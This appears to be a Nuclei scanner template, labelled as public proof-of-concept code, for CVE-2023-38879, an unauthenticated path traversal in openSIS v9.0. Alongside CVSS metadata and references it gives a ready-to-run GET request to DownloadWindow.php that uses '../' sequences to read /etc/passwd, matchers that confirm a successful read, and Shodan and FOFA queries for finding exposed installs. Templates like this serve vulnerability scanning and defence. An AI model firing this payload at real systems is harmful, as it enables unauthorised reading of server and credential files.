A path traversal vulnerability exists in openSIS Classic Community Edition v9.0 via the 'filename' parameter in DownloadWindow.php. An unauthenticated remote attacker can exploit this to read arbitrary files on the server by manipulating file paths.
PoC代码[已公开]
id: CVE-2023-38879
info:
name: openSIS v9.0 - Path Traversal
author: haliteroglu
severity: high
description: |
A path traversal vulnerability exists in openSIS Classic Community Edition v9.0 via the 'filename' parameter in DownloadWindow.php. An unauthenticated remote attacker can exploit this to read arbitrary files on the server by manipulating file paths.
reference:
- https://github.com/dub-flow/vulnerability-research/tree/main/CVE-2023-38879
- https://nvd.nist.gov/vuln/detail/CVE-2023-38879
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-38879
cwe-id: CWE-22
epss-score: 0.16369
epss-percentile: 0.94631
cpe: cpe:2.3:a:os4ed:opensis:9.0:*:*:*:community:*:*:*
metadata:
verified: true
max-request: 1
vendor: os4ed
product: opensis
shodan-query: title:"openSIS"
fofa-query: title="openSIS"
tags: cve,cve2023,opensis,lfi
http:
- method: GET
path:
- "{{BaseURL}}/DownloadWindow.php?filename=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "filename="
- "text/html"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100eb3bc26631e13f24e82391ebf5413528e1059b74840bb51d5851927d11ed72ff02203721c0ea41c27a89286aec7fce5f66c3635cdf559b352d55093be3e5d554cc15:922c64590222798bb761d5b6d8e72950